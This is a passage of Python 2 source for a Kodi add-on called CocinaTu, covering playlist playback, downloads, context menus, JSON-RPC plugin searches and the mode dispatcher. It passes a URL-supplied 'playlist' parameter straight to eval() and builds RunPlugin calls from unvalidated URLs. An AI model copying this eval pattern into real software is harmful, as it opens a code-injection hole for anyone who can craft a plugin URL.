  2457. url2 = url.replace(';','')
  2458. liz = xbmcgui.ListItem(playname, iconImage=iconimage, thumbnailImage=iconimage)
  2459. liz.setInfo(type='Video', infoLabels={'Title':playname})
  2460. liz.setProperty("IsPlayable","true")
  2461. liz.setPath(url2)
  2462. xbmc.Player().play(url2,liz)
  2463.  
  2464. else:
  2465. url = mu_playlist[index]
  2466. url=url.split('&regexs=')[0]
  2467. liz = xbmcgui.ListItem(playname, iconImage=iconimage, thumbnailImage=iconimage)
  2468. liz.setInfo(type='Video', infoLabels={'Title':playname})
  2469. liz.setProperty("IsPlayable","true")
  2470. liz.setPath(url)
  2471. xbmc.Player().play(url,liz)
  2472. elif not queueVideo:
  2473. #playlist = xbmc.PlayList(1) # 1 means video
  2474. playlist.clear()
  2475. item = 0
  2476. for i in mu_playlist:
  2477. item += 1
  2478. info = xbmcgui.ListItem('%s) %s' %(str(item),name))
  2479. # Don't do this as regex parsed might take longer
  2480. try:
  2481. if "$doregex" in i:
  2482. sepate = i.split('&regexs=')
  2483. # print sepate
  2484. url,setresolved = getRegexParsed(sepate[1], sepate[0])
  2485. elif "&mode=19" in i:
  2486. url = urlsolver(i.replace('&mode=19','').replace(';',''))
  2487. if url:
  2488. playlist.add(url, info)
  2489. else:
  2490. raise
  2491. except Exception:
  2492. playlist.add(i, info)
  2493. pass #xbmc.Player().play(url)
  2494.  
  2495. xbmc.executebuiltin('playlist.playoffset(video,0)')
  2496. else:
  2497.  
  2498. listitem = xbmcgui.ListItem(name)
  2499. playlist.add(mu_playlist, listitem)
  2500.  
  2501.  
  2502. def download_file(name, url):
  2503.  
  2504. if addon.getSetting('save_location') == "":
  2505. xbmc.executebuiltin("XBMC.Notification('CocinaTu','Choose a location to save files.',15000,"+icon+")")
  2506. addon.openSettings()
  2507. params = {'url': url, 'download_path': addon.getSetting('save_location')}
  2508. downloader.download(name, params)
  2509. dialog = xbmcgui.Dialog()
  2510. ret = dialog.yesno('CocinaTu', 'Do you want to add this file as a source?')
  2511. if ret:
  2512. addSource(os.path.join(addon.getSetting('save_location'), name))
  2513.  
  2514. def _search(url,name):
  2515. # print url,name
  2516. pluginsearchurls = ['plugin://plugin.video.genesis/?action=shows_search',\
  2517. 'plugin://plugin.video.genesis/?action=movies_search',\
  2518. 'plugin://plugin.video.salts/?mode=search&amp;section=Movies',\
  2519. 'plugin://plugin.video.salts/?mode=search&amp;section=TV',\
  2520. 'plugin://plugin.video.muchmovies.hd/?action=movies_search',\
  2521. 'plugin://plugin.video.viooz.co/?action=root_search',\
  2522. 'plugin://plugin.video.ororotv/?action=shows_search',\
  2523. 'plugin://plugin.video.yifymovies.hd/?action=movies_search',\
  2524. 'plugin://plugin.video.cartoonhdtwo/?description&amp;fanart&amp;iconimage&amp;mode=3&amp;name=Search&amp;url=url',\
  2525. 'plugin://plugin.video.youtube/kodion/search/list/',\
  2526. 'plugin://plugin.video.dailymotion_com/?mode=search&amp;url',\
  2527. 'plugin://plugin.video.vimeo/kodion/search/list/'\
  2528. ]
  2529. names = ['Gensis TV','Genesis Movie','Salt movie','salt TV','Muchmovies','viooz','ORoroTV',\
  2530. 'Yifymovies','cartoonHD','Youtube','DailyMotion','Vimeo']
  2531. dialog = xbmcgui.Dialog()
  2532. index = dialog.select('Choose a video source', names)
  2533.  
  2534. if index >= 0:
  2535. url = pluginsearchurls[index]
  2536. # print 'url',url
  2537. pluginquerybyJSON(url)
  2538.  
  2539. def addDir(name,url,mode,iconimage,fanart,description,genre,date,credits,showcontext=False,regexs=None,reg_url=None,allinfo={}):
  2540.  
  2541.  
  2542.  
  2543. if regexs and len(regexs)>0:
  2544. u=sys.argv[0]+"?url="+urllib.quote_plus(url)+"&mode="+str(mode)+"&name="+urllib.quote_plus(name)+"&fanart="+urllib.quote_plus(fanart)+"&regexs="+regexs
  2545. else:
  2546. u=sys.argv[0]+"?url="+urllib.quote_plus(url)+"&mode="+str(mode)+"&name="+urllib.quote_plus(name)+"&fanart="+urllib.quote_plus(fanart)
  2547.  
  2548. ok=True
  2549. if date == '':
  2550. date = None
  2551. else:
  2552. description += '\n\nDate: %s' %date
  2553. liz=xbmcgui.ListItem(name, iconImage="DefaultFolder.png", thumbnailImage=iconimage)
  2554. if len(allinfo) <1 :
  2555. liz.setInfo(type="Video", infoLabels={ "Title": name, "Plot": description, "Genre": genre, "dateadded": date, "credits": credits })
  2556. else:
  2557. liz.setInfo(type="Video", infoLabels= allinfo)
  2558. liz.setProperty("Fanart_Image", fanart)
  2559. if showcontext:
  2560. contextMenu = []
  2561. parentalblock =addon.getSetting('parentalblocked')
  2562. parentalblock= parentalblock=="true"
  2563. parentalblockedpin =addon.getSetting('parentalblockedpin')
  2564. # print 'parentalblockedpin',parentalblockedpin
  2565. if len(parentalblockedpin)>0:
  2566. if parentalblock:
  2567. contextMenu.append(('CocinaTu Activar Bloqueo Parental','XBMC.RunPlugin(%s?mode=55&name=%s)' %(sys.argv[0], urllib.quote_plus(name))))
  2568. else:
  2569. contextMenu.append(('CocinaTu Bloqueo Parental Desactivado','XBMC.RunPlugin(%s?mode=56&name=%s)' %(sys.argv[0], urllib.quote_plus(name))))
  2570.  
  2571. if showcontext == 'source':
  2572.  
  2573. if name in str(SOURCES):
  2574. contextMenu.append(('Remove from Sources','XBMC.RunPlugin(%s?mode=8&name=%s)' %(sys.argv[0], urllib.quote_plus(name))))
  2575.  
  2576.  
  2577. elif showcontext == 'download':
  2578. contextMenu.append(('Download','XBMC.RunPlugin(%s?url=%s&mode=9&name=%s)'
  2579. %(sys.argv[0], urllib.quote_plus(url), urllib.quote_plus(name))))
  2580. elif showcontext == 'fav':
  2581. contextMenu.append(('Borrar de Favoritos CocinaTu','XBMC.RunPlugin(%s?mode=6&name=%s)'
  2582. %(sys.argv[0], urllib.quote_plus(name))))
  2583. if showcontext == '!!update':
  2584. fav_params2 = (
  2585. '%s?url=%s&mode=17&regexs=%s'
  2586. %(sys.argv[0], urllib.quote_plus(reg_url), regexs)
  2587. )
  2588. contextMenu.append(('[COLOR gold]CocinaTu[/COLOR]','XBMC.RunPlugin(%s)' %fav_params2))
  2589. if not name in FAV:
  2590. contextMenu.append(('Agregar a Favoritos de CocinaTu','XBMC.RunPlugin(%s?mode=5&name=%s&url=%s&iconimage=%s&fanart=%s&fav_mode=%s)'
  2591. %(sys.argv[0], urllib.quote_plus(name), urllib.quote_plus(url), urllib.quote_plus(iconimage), urllib.quote_plus(fanart), mode)))
  2592. liz.addContextMenuItems(contextMenu)
  2593. ok=xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]),url=u,listitem=liz,isFolder=True)
  2594. return ok
  2595. def ytdl_download(url,title,media_type='video'):
  2596. # play in xbmc while playing go back to contextMenu(c) to "!!Download!!"
  2597. # Trial yasceen: seperate |User-Agent=
  2598. import youtubedl
  2599.  
  2600. if not url == '':
  2601. if media_type== 'audio':
  2602. youtubedl.single_YD(url,download=True,audio=True)
  2603. else:
  2604. youtubedl.single_YD(url,download=True)
  2605. elif xbmc.Player().isPlaying() == True :
  2606. import YDStreamExtractor
  2607. if YDStreamExtractor.isDownloading() == True:
  2608.  
  2609. YDStreamExtractor.manageDownloads()
  2610. else:
  2611. xbmc_url = xbmc.Player().getPlayingFile()
  2612.  
  2613. xbmc_url = xbmc_url.split('|User-Agent=')[0]
  2614. info = {'url':xbmc_url,'title':title,'media_type':media_type}
  2615. youtubedl.single_YD('',download=True,dl_info=info)
  2616. else:
  2617. xbmc.executebuiltin("XBMC.Notification(DOWNLOAD,First Play [COLOR yellow]WHILE playing download[/COLOR] ,10000)")
  2618.  
  2619. ## Lunatixz PseudoTV feature
  2620. def ascii(string):
  2621. if isinstance(string, basestring):
  2622. if isinstance(string, unicode):
  2623. string = string.encode('ascii', 'ignore')
  2624. return string
  2625. def uni(string, encoding = 'utf-8'):
  2626. if isinstance(string, basestring):
  2627. if not isinstance(string, unicode):
  2628. string = unicode(string, encoding, 'ignore')
  2629. return string
  2630. def removeNonAscii(s): return "".join(filter(lambda x: ord(x)<128, s))
  2631.  
  2632. def sendJSON( command):
  2633. data = ''
  2634. try:
  2635. data = xbmc.executeJSONRPC(uni(command))
  2636. except UnicodeEncodeError:
  2637. data = xbmc.executeJSONRPC(ascii(command))
  2638.  
  2639. return uni(data)
  2640.  
  2641. def pluginquerybyJSON(url,give_me_result=None,playlist=False):
  2642. if 'audio' in url:
  2643. json_query = uni('{"jsonrpc":"2.0","method":"Files.GetDirectory","params": {"directory":"%s","media":"video", "properties": ["title", "album", "artist", "duration","thumbnail", "year"]}, "id": 1}') %url
  2644. else:
  2645. json_query = uni('{"jsonrpc":"2.0","method":"Files.GetDirectory","params":{"directory":"%s","media":"video","properties":[ "plot","playcount","director", "genre","votes","duration","trailer","premiered","thumbnail","title","year","dateadded","fanart","rating","season","episode","studio","mpaa"]},"id":1}') %url
  2646. json_folder_detail = json.loads(sendJSON(json_query))
  2647. #print json_folder_detail
  2648. if give_me_result:
  2649. return json_folder_detail
  2650. if json_folder_detail.has_key('error'):
  2651. return
  2652. else:
  2653.  
  2654. for i in json_folder_detail['result']['files'] :
  2655. meta ={}
  2656. url = i['file']
  2657. name = removeNonAscii(i['label'])
  2658. thumbnail = removeNonAscii(i['thumbnail'])
  2659. fanart = removeNonAscii(i['fanart'])
  2660. meta = dict((k,v) for k, v in i.iteritems() if not v == '0' or not v == -1 or v == '')
  2661. meta.pop("file", None)
  2662. if i['filetype'] == 'file':
  2663. if playlist:
  2664. play_playlist(name,url,queueVideo='1')
  2665. continue
  2666. else:
  2667. addLink(url,name,thumbnail,fanart,'','','','',None,'',total=len(json_folder_detail['result']['files']),allinfo=meta)
  2668. #xbmc.executebuiltin("Container.SetViewMode(500)")
  2669. if i['type'] and i['type'] == 'tvshow' :
  2670. xbmcplugin.setContent(int(sys.argv[1]), 'tvshows')
  2671. elif i['episode'] > 0 :
  2672. xbmcplugin.setContent(int(sys.argv[1]), 'episodes')
  2673.  
  2674. else:
  2675. addDir(name,url,53,thumbnail,fanart,'','','','',allinfo=meta)
  2676. xbmcplugin.endOfDirectory(int(sys.argv[1]))
  2677.  
  2678. def addLink(url,name,iconimage,fanart,description,genre,date,showcontext,playlist,regexs,total,setCookie="",allinfo={}):
  2679. #print 'url,name',url,name,iconimage
  2680. contextMenu =[]
  2681. parentalblock =addon.getSetting('parentalblocked')
  2682. parentalblock= parentalblock=="true"
  2683. parentalblockedpin =addon.getSetting('parentalblockedpin')
  2684. # print 'parentalblockedpin',parentalblockedpin
  2685. if len(parentalblockedpin)>0:
  2686. if parentalblock:
  2687. contextMenu.append(('CocinaTu Activar Bloqueo Parental','XBMC.RunPlugin(%s?mode=55&name=%s)' %(sys.argv[0], urllib.quote_plus(name))))
  2688. else:
  2689. contextMenu.append(('CocinaTu Desactivar Bloqueo Parental','XBMC.RunPlugin(%s?mode=56&name=%s)' %(sys.argv[0], urllib.quote_plus(name))))
  2690.  
  2691. try:
  2692. name = name.encode('utf-8')
  2693. except: pass
  2694. ok = True
  2695. isFolder=False
  2696. if regexs:
  2697. mode = '17'
  2698. if 'listrepeat' in regexs:
  2699. isFolder=True
  2700. # print 'setting as folder in link'
  2701. contextMenu.append(('[COLOR white]!!Download Currently Playing!![/COLOR]','XBMC.RunPlugin(%s?url=%s&mode=21&name=%s)'
  2702. %(sys.argv[0], urllib.quote_plus(url), urllib.quote_plus(name))))
  2703. elif (any(x in url for x in resolve_url) and url.startswith('http')) or url.endswith('&mode=19'):
  2704. url=url.replace('&mode=19','')
  2705. mode = '19'
  2706. contextMenu.append(('[COLOR white]!!Download Currently Playing!![/COLOR]','XBMC.RunPlugin(%s?url=%s&mode=21&name=%s)'
  2707. %(sys.argv[0], urllib.quote_plus(url), urllib.quote_plus(name))))
  2708. elif url.endswith('&mode=18'):
  2709. url=url.replace('&mode=18','')
  2710. mode = '18'
  2711. contextMenu.append(('[COLOR white]!!Download!![/COLOR]','XBMC.RunPlugin(%s?url=%s&mode=23&name=%s)'
  2712. %(sys.argv[0], urllib.quote_plus(url), urllib.quote_plus(name))))
  2713. if addon.getSetting('dlaudioonly') == 'true':
  2714. contextMenu.append(('!!Download [COLOR seablue]Audio!![/COLOR]','XBMC.RunPlugin(%s?url=%s&mode=24&name=%s)'
  2715. %(sys.argv[0], urllib.quote_plus(url), urllib.quote_plus(name))))
  2716. elif url.startswith('magnet:?xt='):
  2717. if '&' in url and not '&amp;' in url :
  2718. url = url.replace('&','&amp;')
  2719. url = 'plugin://plugin.video.pulsar/play?uri=' + url
  2720. mode = '12'
  2721. else:
  2722. mode = '12'
  2723. contextMenu.append(('[COLOR white]!!Download Currently Playing!![/COLOR]','XBMC.RunPlugin(%s?url=%s&mode=21&name=%s)'
  2724. %(sys.argv[0], urllib.quote_plus(url), urllib.quote_plus(name))))
  2725. if 'plugin://plugin.video.youtube/play/?video_id=' in url:
  2726. yt_audio_url = url.replace('plugin://plugin.video.youtube/play/?video_id=','https://www.youtube.com/watch?v=')
  2727. contextMenu.append(('!!Download [COLOR blue]Audio!![/COLOR]','XBMC.RunPlugin(%s?url=%s&mode=24&name=%s)'
  2728. %(sys.argv[0], urllib.quote_plus(yt_audio_url), urllib.quote_plus(name))))
  2729. u=sys.argv[0]+"?"
  2730. play_list = False
  2731. if playlist:
  2732. if addon.getSetting('add_playlist') == "false" and '$$LSPlayOnlyOne$$' not in playlist[0] :
  2733. u += "url="+urllib.quote_plus(url)+"&mode="+mode
  2734. else:
  2735. u += "mode=13&name=%s&playlist=%s" %(urllib.quote_plus(name), urllib.quote_plus(str(playlist).replace(',','||')))
  2736. name = name + '[COLOR magenta] (' + str(len(playlist)) + ' items )[/COLOR]'
  2737. play_list = True
  2738. else:
  2739. u += "url="+urllib.quote_plus(url)+"&mode="+mode
  2740. if regexs:
  2741. u += "&regexs="+regexs
  2742. if not setCookie == '':
  2743. u += "&setCookie="+urllib.quote_plus(setCookie)
  2744. if iconimage and not iconimage == '':
  2745. u += "&iconimage="+urllib.quote_plus(iconimage)
  2746.  
  2747. if date == '':
  2748. date = None
  2749. else:
  2750. description += '\n\nDate: %s' %date
  2751. liz=xbmcgui.ListItem(name, iconImage="DefaultVideo.png", thumbnailImage=iconimage)
  2752. #if isFolder:
  2753. if allinfo==None or len(allinfo) <1:
  2754. liz.setInfo(type="Video", infoLabels={ "Title": name, "Plot": description, "Genre": genre, "dateadded": date })
  2755. else:
  2756. liz.setInfo(type="Video", infoLabels=allinfo)
  2757. liz.setProperty("Fanart_Image", fanart)
  2758.  
  2759. if (not play_list) and not any(x in url for x in g_ignoreSetResolved) and not '$PLAYERPROXY$=' in url:# (not url.startswith('plugin://plugin.video.f4mTester')):
  2760. if regexs:
  2761. #print urllib.unquote_plus(regexs)
  2762. if '$pyFunction:playmedia(' not in urllib.unquote_plus(regexs) and 'notplayable' not in urllib.unquote_plus(regexs) and 'listrepeat' not in urllib.unquote_plus(regexs) :
  2763. #print 'setting isplayable',url, urllib.unquote_plus(regexs),url
  2764. liz.setProperty('IsPlayable', 'true')
  2765. else:
  2766. liz.setProperty('IsPlayable', 'true')
  2767. else:
  2768. addon_log( 'NOT setting isplayable'+url)
  2769. if showcontext:
  2770. #contextMenu = []
  2771. if showcontext == 'fav':
  2772. contextMenu.append(
  2773. ('Borrado de Favortitos de CocinaTu','XBMC.RunPlugin(%s?mode=6&name=%s)'
  2774. %(sys.argv[0], urllib.quote_plus(name)))
  2775. )
  2776. elif not name in FAV:
  2777. try:
  2778. fav_params = (
  2779. '%s?mode=5&name=%s&url=%s&iconimage=%s&fanart=%s&fav_mode=0'
  2780. %(sys.argv[0], urllib.quote_plus(name), urllib.quote_plus(url), urllib.quote_plus(iconimage), urllib.quote_plus(fanart))
  2781. )
  2782. except:
  2783. fav_params = (
  2784. '%s?mode=5&name=%s&url=%s&iconimage=%s&fanart=%s&fav_mode=0'
  2785. %(sys.argv[0], urllib.quote_plus(name), urllib.quote_plus(url), urllib.quote_plus(iconimage.encode("utf-8")), urllib.quote_plus(fanart.encode("utf-8")))
  2786. )
  2787. if playlist:
  2788. fav_params += 'playlist='+urllib.quote_plus(str(playlist).replace(',','||'))
  2789. if regexs:
  2790. fav_params += "&regexs="+regexs
  2791. contextMenu.append(('Agregar a favoritos de CocinaTu','XBMC.RunPlugin(%s)' %fav_params))
  2792. liz.addContextMenuItems(contextMenu)
  2793. try:
  2794. if not playlist is None:
  2795. if addon.getSetting('add_playlist') == "false":
  2796. playlist_name = name.split(') ')[1]
  2797. contextMenu_ = [
  2798. ('Play '+playlist_name+' PlayList','XBMC.RunPlugin(%s?mode=13&name=%s&playlist=%s)'
  2799. %(sys.argv[0], urllib.quote_plus(playlist_name), urllib.quote_plus(str(playlist).replace(',','||'))))
  2800. ]
  2801. liz.addContextMenuItems(contextMenu_)
  2802. except: pass
  2803. #print 'adding',name
  2804. ok=xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]),url=u,listitem=liz,totalItems=total,isFolder=isFolder)
  2805.  
  2806. #print 'added',name
  2807. return ok
  2808.  
  2809.  
  2810. def playsetresolved(url,name,iconimage,setresolved=True,reg=None):
  2811. print 'playsetresolved',url,setresolved
  2812. if url==None:
  2813. xbmcplugin.endOfDirectory(int(sys.argv[1]))
  2814. return
  2815. if setresolved:
  2816. setres=True
  2817. if '$$LSDirect$$' in url:
  2818. url=url.replace('$$LSDirect$$','')
  2819. setres=False
  2820. if reg and 'notplayable' in reg:
  2821. setres=False
  2822.  
  2823. liz = xbmcgui.ListItem(name, iconImage=iconimage, thumbnailImage=iconimage)
  2824. liz.setInfo(type='Video', infoLabels={'Title':name})
  2825. liz.setProperty("IsPlayable","true")
  2826. liz.setPath(url)
  2827. if not setres:
  2828. xbmc.Player().play(url)
  2829. else:
  2830. xbmcplugin.setResolvedUrl(int(sys.argv[1]), True, liz)
  2831.  
  2832. else:
  2833. xbmc.executebuiltin('XBMC.RunPlugin('+url+')')
  2834.  
  2835.  
  2836. ## Thanks to daschacka, an epg scraper for http://i.teleboy.ch/programm/station_select.php
  2837. ## http://forum.xbmc.org/post.php?p=936228&postcount=1076
  2838. def getepg(link):
  2839. url=urllib.urlopen(link)
  2840. source=url.read()
  2841. url.close()
  2842. source2 = source.split("Jetzt")
  2843. source3 = source2[1].split('programm/detail.php?const_id=')
  2844. sourceuhrzeit = source3[1].split('<br /><a href="/')
  2845. nowtime = sourceuhrzeit[0][40:len(sourceuhrzeit[0])]
  2846. sourcetitle = source3[2].split("</a></p></div>")
  2847. nowtitle = sourcetitle[0][17:len(sourcetitle[0])]
  2848. nowtitle = nowtitle.encode('utf-8')
  2849. return " - "+nowtitle+" - "+nowtime
  2850.  
  2851.  
  2852. def get_epg(url, regex):
  2853. data = makeRequest(url)
  2854. try:
  2855. item = re.findall(regex, data)[0]
  2856. return item
  2857. except:
  2858. addon_log('regex failed')
  2859. addon_log(regex)
  2860. return
  2861.  
  2862.  
  2863. ##not a generic implemenation as it needs to convert
  2864. def d2x(d, root="root",nested=0):
  2865.  
  2866. op = lambda tag: '<' + tag + '>'
  2867. cl = lambda tag: '</' + tag + '>\n'
  2868.  
  2869. ml = lambda v,xml: xml + op(key) + str(v) + cl(key)
  2870. xml = op(root) + '\n' if root else ""
  2871.  
  2872. for key,vl in d.iteritems():
  2873. vtype = type(vl)
  2874. if nested==0: key='regex' #enforcing all top level tags to be named as regex
  2875. if vtype is list:
  2876. for v in vl:
  2877. v=escape(v)
  2878. xml = ml(v,xml)
  2879.  
  2880. if vtype is dict:
  2881. xml = ml('\n' + d2x(vl,None,nested+1),xml)
  2882. if vtype is not list and vtype is not dict:
  2883. if not vl is None: vl=escape(vl)
  2884. #print repr(vl)
  2885. if vl is None:
  2886. xml = ml(vl,xml)
  2887. else:
  2888. #xml = ml(escape(vl.encode("utf-8")),xml)
  2889. xml = ml(vl.encode("utf-8"),xml)
  2890.  
  2891. xml += cl(root) if root else ""
  2892.  
  2893. return xml
  2894. xbmcplugin.setContent(int(sys.argv[1]), 'movies')
  2895.  
  2896. try:
  2897. xbmcplugin.addSortMethod(int(sys.argv[1]), xbmcplugin.SORT_METHOD_UNSORTED)
  2898. except:
  2899. pass
  2900. try:
  2901. xbmcplugin.addSortMethod(int(sys.argv[1]), xbmcplugin.SORT_METHOD_LABEL)
  2902. except:
  2903. pass
  2904. try:
  2905. xbmcplugin.addSortMethod(int(sys.argv[1]), xbmcplugin.SORT_METHOD_DATE)
  2906. except:
  2907. pass
  2908. try:
  2909. xbmcplugin.addSortMethod(int(sys.argv[1]), xbmcplugin.SORT_METHOD_GENRE)
  2910. except:
  2911. pass
  2912.  
  2913. params=get_params()
  2914.  
  2915. url=None
  2916. name=None
  2917. mode=None
  2918. playlist=None
  2919. iconimage=None
  2920. fanart=FANART
  2921. playlist=None
  2922. fav_mode=None
  2923. regexs=None
  2924.  
  2925. try:
  2926. url=urllib.unquote_plus(params["url"]).decode('utf-8')
  2927. except:
  2928. pass
  2929. try:
  2930. name=urllib.unquote_plus(params["name"])
  2931. except:
  2932. pass
  2933. try:
  2934. iconimage=urllib.unquote_plus(params["iconimage"])
  2935. except:
  2936. pass
  2937. try:
  2938. fanart=urllib.unquote_plus(params["fanart"])
  2939. except:
  2940. pass
  2941. try:
  2942. mode=int(params["mode"])
  2943. except:
  2944. pass
  2945. try:
  2946. playlist=eval(urllib.unquote_plus(params["playlist"]).replace('||',','))
  2947. except:
  2948. pass
  2949. try:
  2950. fav_mode=int(params["fav_mode"])
  2951. except:
  2952. pass
  2953. try:
  2954. regexs=params["regexs"]
  2955. except:
  2956. pass
  2957. playitem=''
  2958. try:
  2959. playitem=urllib.unquote_plus(params["playitem"])
  2960. except:
  2961. pass
  2962.  
  2963. addon_log("Mode: "+str(mode))
  2964.  
  2965.  
  2966. if not url is None:
  2967. addon_log("URL: "+str(url.encode('utf-8')))
  2968. addon_log("Name: "+str(name))
  2969.  
  2970. if not playitem =='':
  2971. s=getSoup('',data=playitem)
  2972. name,url,regexs=getItems(s,None,dontLink=True)
  2973. mode=117
  2974. if mode==None:
  2975.  
  2976. import xbmc
  2977. xbmc.executebuiltin("XBMC.Notification(CocinaTu,Ultima Version: 0.0.1, 7000,"+icon+")")
  2978.  
  2979.  
  2980. addon_log("getSources")
  2981. getSources()
  2982. xbmcplugin.endOfDirectory(int(sys.argv[1]))
  2983.  
  2984. __addon__ = xbmcaddon.Addon()
  2985. __addonname__ = __addon__.getAddonInfo('name')
  2986.  
  2987.  
  2988. line1 = "Este addon es Totalmente gratuito. CocinaTu no contiene ningún archivo Propio Todos Los que Hay Son"
  2989. line2 = "Recolectados de internet, CocinaTu no se hacen responsable de dicho contenido "
  2990. line3 = "Ni del uso no responsable del mismo. El copyright de las imágenes pertenece a sus respectivos autores y/o productoras/distribuidoras."
  2991. xbmcgui.Dialog().ok(__addonname__, line1, line2, line3)
  2992.  
  2993.  
  2994.  
  2995. elif mode==1:
  2996. addon_log("getData")
  2997.  
  2998.  
  2999.  
  3000. data=None
  3001.  
  3002. if regexs and len(regexs)>0:
  3003. data,setresolved=getRegexParsed(regexs, url)
  3004. #print data
  3005. #url=''
  3006. if data.startswith('http') or data.startswith('smb') or data.startswith('nfs') or data.startswith('/'):
  3007. url=data
  3008. data=None
  3009. #create xml here
  3010.  
  3011. getData(url,fanart,data)
  3012. xbmcplugin.endOfDirectory(int(sys.argv[1]))
  3013.  
  3014.  
  3015.  
  3016. elif mode==2:
  3017. addon_log("getChannelItems")
  3018. getChannelItems(name,url,fanart)
  3019. xbmcplugin.endOfDirectory(int(sys.argv[1]))
  3020.  
  3021. elif mode==3:
  3022. addon_log("getSubChannelItems")
  3023. getSubChannelItems(name,url,fanart)
  3024. xbmcplugin.endOfDirectory(int(sys.argv[1]))
  3025.  
  3026. elif mode==4:
  3027. addon_log("getFavorites")
  3028. getFavorites()
  3029. xbmcplugin.endOfDirectory(int(sys.argv[1]))
  3030.  
  3031. elif mode==5:
  3032. addon_log("addFavorite")
  3033. try:
  3034. name = name.split('\\ ')[1]
  3035. except:
  3036. pass
  3037. try:
  3038. name = name.split(' - ')[0]
  3039. except:
  3040. pass
  3041. addFavorite(name,url,iconimage,fanart,fav_mode)
  3042.  
  3043. elif mode==6:
  3044. addon_log("rmFavorite")
  3045. try:
  3046. name = name.split('\\ ')[1]
  3047. except:
  3048. pass
  3049. try:
  3050. name = name.split(' - ')[0]
  3051. except:
  3052. pass
  3053. rmFavorite(name)
  3054.  
  3055. elif mode==7:
  3056. SportsDevil()
  3057. Dutch()
  3058.  
  3059. elif mode==8:
  3060. addon_log("rmSource")
  3061. rmSource(name)
  3062.  
  3063. elif mode==9:
  3064. addon_log("download_file")
  3065. download_file(name, url)
  3066.  
  3067. elif mode==10:
  3068. addon_log("getCommunitySources")
  3069. getCommunitySources()
  3070.  
  3071. elif mode==11:
  3072. addon_log("addSource")
  3073. addSource(url)
  3074.  
  3075. elif mode==12:
  3076. addon_log("setResolvedUrl")
  3077. if not url.startswith("plugin://plugin") or not any(x in url for x in g_ignoreSetResolved):#not url.startswith("plugin://plugin.video.f4mTester") :
  3078. setres=True
  3079. if '$$LSDirect$$' in url:
  3080. url=url.replace('$$LSDirect$$','')
  3081. setres=False
  3082. item = xbmcgui.ListItem(path=url)
  3083. if not setres:
  3084. xbmc.Player().play(url)
  3085. else:
  3086. xbmcplugin.setResolvedUrl(int(sys.argv[1]), True, item)
  3087. else:
  3088. # print 'Not setting setResolvedUrl'
  3089. xbmc.executebuiltin('XBMC.RunPlugin('+url+')')
  3090.  
  3091.  
  3092. elif mode==13:
  3093. addon_log("play_playlist")
  3094. play_playlist(name, playlist)
  3095.  
  3096. elif mode==14:
  3097. addon_log("get_xml_database")
  3098. get_xml_database(url)
  3099. xbmcplugin.endOfDirectory(int(sys.argv[1]))
  3100.  
  3101. elif mode==15:
  3102. addon_log("browse_xml_database")
  3103. get_xml_database(url, True)
  3104. xbmcplugin.endOfDirectory(int(sys.argv[1]))
  3105.  
  3106. elif mode==16:
  3107. addon_log("browse_community")
  3108. getCommunitySources(url,browse=True)
  3109. xbmcplugin.endOfDirectory(int(sys.argv[1]))
  3110.  
  3111. elif mode==17 or mode==117:
  3112. addon_log("getRegexParsed")
  3113.  
  3114. data=None
  3115. if regexs and 'listrepeat' in urllib.unquote_plus(regexs):
  3116. listrepeat,ret,m,regexs, cookieJar =getRegexParsed(regexs, url)
  3117. #print listrepeat,ret,m,regexs
  3118. d=''
  3119. # print 'm is' , m
  3120. # print 'regexs',regexs
  3121. regexname=m['name']
  3122. existing_list=regexs.pop(regexname)
  3123. # print 'final regexs',regexs,regexname
  3124. url=''
  3125. import copy
  3126. ln=''
  3127. rnumber=0
  3128. for obj in ret:
  3129. #print 'obj',obj
  3130. try:
  3131. rnumber+=1
  3132. newcopy=copy.deepcopy(regexs)
  3133. # print 'newcopy',newcopy, len(newcopy)
  3134. listrepeatT=listrepeat
  3135. i=0
  3136. for i in range(len(obj)):
  3137. # print 'i is ',i, len(obj), len(newcopy)
  3138. if len(newcopy)>0:
  3139. for the_keyO, the_valueO in newcopy.iteritems():
  3140. if the_valueO is not None:
  3141. for the_key, the_value in the_valueO.iteritems():
  3142. if the_value is not None:
  3143. # print 'key and val',the_key, the_value
  3144. # print 'aa'
  3145. # print '[' + regexname+'.param'+str(i+1) + ']'
  3146. # print repr(obj[i])
  3147. if type(the_value) is dict:
  3148. for the_keyl, the_valuel in the_value.iteritems():
  3149. if the_valuel is not None:
  3150. val=None
  3151. if isinstance(obj,tuple):
  3152. try:
  3153. val= obj[i].decode('utf-8')
  3154. except:
  3155. val= obj[i]
  3156. else:
  3157. try:
  3158. val= obj.decode('utf-8')
  3159. except:
  3160. val= obj
  3161.  
  3162. if '[' + regexname+'.param'+str(i+1) + '][DE]' in the_valuel:
  3163. the_valuel=the_valuel.replace('[' + regexname+'.param'+str(i+1) + '][DE]', unescape(val))
  3164. the_value[the_keyl]=the_valuel.replace('[' + regexname+'.param'+str(i+1) + ']', val)
  3165. #print 'first sec',the_value[the_keyl]
  3166.  
  3167. else:
  3168. val=None
  3169. if isinstance(obj,tuple):
  3170. try:
  3171. val=obj[i].decode('utf-8')
  3172. except:
  3173. val=obj[i]
  3174. else:
  3175. try:
  3176. val= obj.decode('utf-8')
  3177. except:
  3178. val= obj
  3179. if '[' + regexname+'.param'+str(i+1) + '][DE]' in the_value:
  3180. #print 'found DE',the_value.replace('[' + regexname+'.param'+str(i+1) + '][DE]', unescape(val))
  3181. the_value=the_value.replace('[' + regexname+'.param'+str(i+1) + '][DE]', unescape(val))
  3182.  
  3183. the_valueO[the_key]=the_value.replace('[' + regexname+'.param'+str(i+1) + ']', val)
  3184. #print 'second sec val',the_valueO[the_key]
  3185.  
  3186. val=None
  3187. if isinstance(obj,tuple):
  3188. try:
  3189. val=obj[i].decode('utf-8')
  3190. except:
  3191. val=obj[i]
  3192. else:
  3193. try:
  3194. val=obj.decode('utf-8')
  3195. except:
  3196. val=obj
  3197. if '[' + regexname+'.param'+str(i+1) + '][DE]' in listrepeatT:
  3198. listrepeatT=listrepeatT.replace('[' + regexname+'.param'+str(i+1) + '][DE]',val)
  3199. listrepeatT=listrepeatT.replace('[' + regexname+'.param'+str(i+1) + ']',escape(val))
  3200. # print listrepeatT
  3201. listrepeatT=listrepeatT.replace('[' + regexname+'.param'+str(0) + ']',str(rnumber))
  3202.  
  3203. try:
  3204. if cookieJar and '[' + regexname+'.cookies]' in listrepeatT:
  3205. listrepeatT=listrepeatT.replace('[' + regexname+'.cookies]',getCookiesString(cookieJar))
  3206. except: pass
  3207.  
  3208. #newcopy = urllib.quote(repr(newcopy))
  3209. # print 'new regex list', repr(newcopy), repr(listrepeatT)
